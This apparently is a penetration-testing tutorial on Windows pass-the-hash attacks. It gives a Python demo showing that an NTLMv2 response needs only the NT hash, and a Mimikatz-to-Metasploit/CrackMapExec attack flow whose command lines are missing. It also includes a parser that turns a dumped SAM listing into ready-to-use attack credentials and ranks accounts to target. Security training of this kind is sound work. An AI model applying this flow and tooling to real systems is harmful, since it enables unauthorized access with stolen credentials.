🔑Pass-The-Hash Attacks
Pass-The-Hash
Pass-the-hash is a credential-reuse technique: an attacker who has harvested a user's NT (NTLM) hash authenticates to the target with the hash itself, without ever cracking it to recover the clear-text password. It works because NTLM challenge-response authentication derives its proof from the NT hash and never from the password, so the hash is a password-equivalent secret.
We can use several tools to carry out a pass-the-hash attack, including:
Metasploit PsExec module (exploit/windows/smb/psexec)
CrackMapExec
This technique gives us access to the target with legitimate credentials rather than by exploiting a vulnerable service, so it does not depend on an unpatched bug and looks like a normal logon in the target's logs. Both tools above reach the target over SMB (TCP 445) and need an account that is a local administrator there; non-built-in local admin accounts are further subject to UAC remote restrictions (LocalAccountTokenFilterPolicy), so the RID 500 Administrator account or a domain account with local admin rights is the usual choice.
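To make the point above concrete, here is an added worked example (not code from the original page) that implements the NT hash (MD4 over the UTF-16LE password) and the NTLMv2 challenge-response as specified in MS-NLMP, then shows that a client holding only the NT hash produces exactly the same response as one holding the password, and that the server's check accepts it. The server challenge, client nonce, timestamp, user and domain are constructed sample values, and the NTLMv2 blob is simplified (the target-info AV pairs are left empty); MD4 is implemented in pure Python because many OpenSSL builds no longer expose it.

```python
import hashlib
import hmac
import struct


def _rol(x: int, n: int) -> int:
    return ((x << n) & 0xFFFFFFFF) | (x >> (32 - n))


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    mask = 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1: F = (b AND c) OR (NOT b AND d), words 0..15
            a = _rol((a + ((b & c) | (~b & d)) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: majority function, words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = _rol((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: parity, words 0,8,4,12,2,10,...
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _rol((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & mask for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password. This is the value Mimikatz reports as 'NTLM'."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)). Only the hash is needed."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_blob(timestamp: int, client_nonce: bytes, target_info: bytes = b"") -> bytes:
    """Simplified NTLMv2 'temp' structure: header, FILETIME, client nonce, target info (empty here)."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_nonce + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NtChallengeResponse = NTProofStr || blob, NTProofStr = HMAC-MD5(NTOWFv2, challenge || blob)."""
    nt_proof = hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


def server_accepts(stored_nt: bytes, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """The verifier (local SAM or DC) recomputes NTProofStr from the stored NT hash it already holds."""
    nt_proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof, expected)


# Constructed sample values standing in for a real exchange.
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_NONCE = bytes.fromhex("fedcba9876543210")
TIMESTAMP = 0x01D9C0FFEE000000  # constructed FILETIME-style value
USER, DOMAIN = "Administrator", "CORP"


def demo(password: str = "password") -> dict:
    """Legitimate client vs. attacker holding only the hash vs. attacker holding the wrong hash."""
    blob = ntlmv2_blob(TIMESTAMP, CLIENT_NONCE)
    stored = nt_hash(password)                     # what the SAM/NTDS holds for this account
    legit = ntlmv2_response(nt_hash(password), USER, DOMAIN, SERVER_CHALLENGE, blob)
    harvested = stored                             # e.g. the hash Mimikatz dumped in step 1
    pth = ntlmv2_response(harvested, USER, DOMAIN, SERVER_CHALLENGE, blob)
    wrong = ntlmv2_response(nt_hash("wrong"), USER, DOMAIN, SERVER_CHALLENGE, blob)
    return {
        "nt_hash": stored.hex(),
        "responses_identical": legit == pth,
        "server_accepts_pth": server_accepts(stored, USER, DOMAIN, SERVER_CHALLENGE, pth),
        "server_accepts_wrong_hash": server_accepts(stored, USER, DOMAIN, SERVER_CHALLENGE, wrong),
    }


if __name__ == "__main__":
    print(demo())
```

The password never enters the computation after nt_hash(); everything the client proves to the server is a function of the 16-byte hash, which is why dumping it is as good as knowing the password for NTLM (but not for Kerberos, which needs a different key derivation). Note that nt_hash("password") yields 8846f7eaee8fb117ad06bdd830b7586c, the value you will recognise from countless hash dumps.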
Attack Flow: Pass-the-Hash Attack
1. Locate User Hashes
Objective: Obtain the NT hashes (and LM hashes, if any; on modern Windows the LM hash is empty) of user accounts on the target server.
Tool: Mimikatz
Command:
Description: Running with local administrator or SYSTEM rights, use Mimikatz to dump the local account hashes from the SAM database and to extract the hashes of currently logged-on users (including domain accounts) from LSASS memory.
2. Pass-the-Hash Attack Using Metasploit
Objective: Gain a session on the target server by authenticating with the harvested hash through the PsExec module.
Tool: Metasploit
Module: exploit/windows/smb/psexec
Commands:
Start Metasploit Console:
Select PsExec Module:
Configure Module Parameters (RHOSTS, SMBUser, SMBDomain and SMBPass; SMBPass takes the hash in LM:NT form rather than a password):
Run the Exploit:
If the Exploit Fails, Set the Target Option (the module offers Automatic, PowerShell, Native upload and MOF upload targets; switching from the default can get past host defences that block one delivery method):
Description: The PsExec module authenticates over SMB with the supplied LM:NT hash pair and, like PsExec itself, starts a service on the target to run the payload and return a session. The LM half can be the empty LM hash aad3b435b51404eeaad3b435b51404ee when the dump shows no LM hash.
3. Pass-the-Hash Attack Using CrackMapExec
Objective: Perform the same pass-the-hash attack with CrackMapExec, which authenticates over SMB with the NT hash and can run commands without dropping a full Meterpreter session.
Tool: CrackMapExec
Commands:
Execute Pass-the-Hash Attack (pass the NT hash with -H; add --local-auth when the account is local rather than a domain account):
Execute Commands on the Server (-x runs a cmd.exe command, -X runs PowerShell):
Description: CrackMapExec reports (Pwn3d!) when the hash grants local administrator access on the target; from there -x and -X execute commands on the server over SMB.
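Bridging step 1 to steps 2 and 3, here is an added example (not from the original page or from the Mimikatz project) that parses the RID, User and Hash NTLM lines of an lsadump::sam dump and emits the credential strings the later steps consume: the LM:NT pair for Metasploit's SMBPass (using the well-known empty LM hash, since modern Windows stores no LM hash) and the bare NT hash for CrackMapExec's -H. It also flags the two things worth checking before you spend time on a hash: whether the account is the RID 500 built-in Administrator (exempt from UAC remote token filtering) and whether the hash is that of an empty password. The dump text is constructed sample output modelled on Mimikatz's format, not real data; check the field labels against the version you run.

```python
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty/absent password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed sample modelled on `lsadump::sam` output; not a real dump.
SAMPLE_SAM_DUMP = """\
Domain : WIN-SERVER
Local SID : S-1-5-21-1111111111-2222222222-3333333333

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 8846f7eaee8fb117ad06bdd830b7586c

RID  : 000001f5 (501)
User : Guest

RID  : 000003e9 (1001)
User : svc_backup
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
"""

_RID = re.compile(r"^RID\s*:\s*[0-9a-fA-F]+\s*\((\d+)\)")
_USER = re.compile(r"^User\s*:\s*(\S+)")
_NTLM = re.compile(r"^\s*Hash NTLM:\s*([0-9a-fA-F]{32})")


def parse_sam_dump(text: str) -> list:
    """Return one record per account that has an NT hash.

    Accounts without a hash line (e.g. a disabled Guest) are skipped, since
    there is nothing to pass.
    """
    records, current = [], {}
    for line in text.splitlines():
        if m := _RID.match(line):
            current = {"rid": int(m.group(1))}       # a new account block starts here
        elif m := _USER.match(line):
            current["user"] = m.group(1)
        elif m := _NTLM.match(line):
            nt = m.group(1).lower()
            current["nt"] = nt
            current["msf_smbpass"] = f"{EMPTY_LM}:{nt}"          # LM:NT form for exploit/windows/smb/psexec
            current["cme_hash"] = nt                              # value for crackmapexec ... -H
            current["builtin_admin"] = current.get("rid") == 500  # RID 500 is not subject to remote UAC filtering
            current["empty_password"] = nt == EMPTY_NT
            records.append(current)
            current = {}
    return records


def targets_worth_trying(records: list) -> list:
    """Order candidates: built-in Administrator first, then the rest; empty-password accounts last."""
    return sorted(records, key=lambda r: (r["empty_password"], not r["builtin_admin"], r["user"]))


if __name__ == "__main__":
    for r in targets_worth_trying(parse_sam_dump(SAMPLE_SAM_DUMP)):
        print(f"{r['user']:<16} rid={r['rid']:<5} SMBPass={r['msf_smbpass']}"
              f"{'  [builtin admin]' if r['builtin_admin'] else ''}"
              f"{'  [empty password]' if r['empty_password'] else ''}")
```

A hash from sekurlsa::logonpasswords (LSASS memory) is labelled differently in Mimikatz output, so it needs its own regex; the SMBPass and -H values are built the same way once you have the 32 hex characters.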
Hacker's Mantra:
Hackers are seen as shadowy figures with superhuman powers that threaten civilization. - Mitch Kapor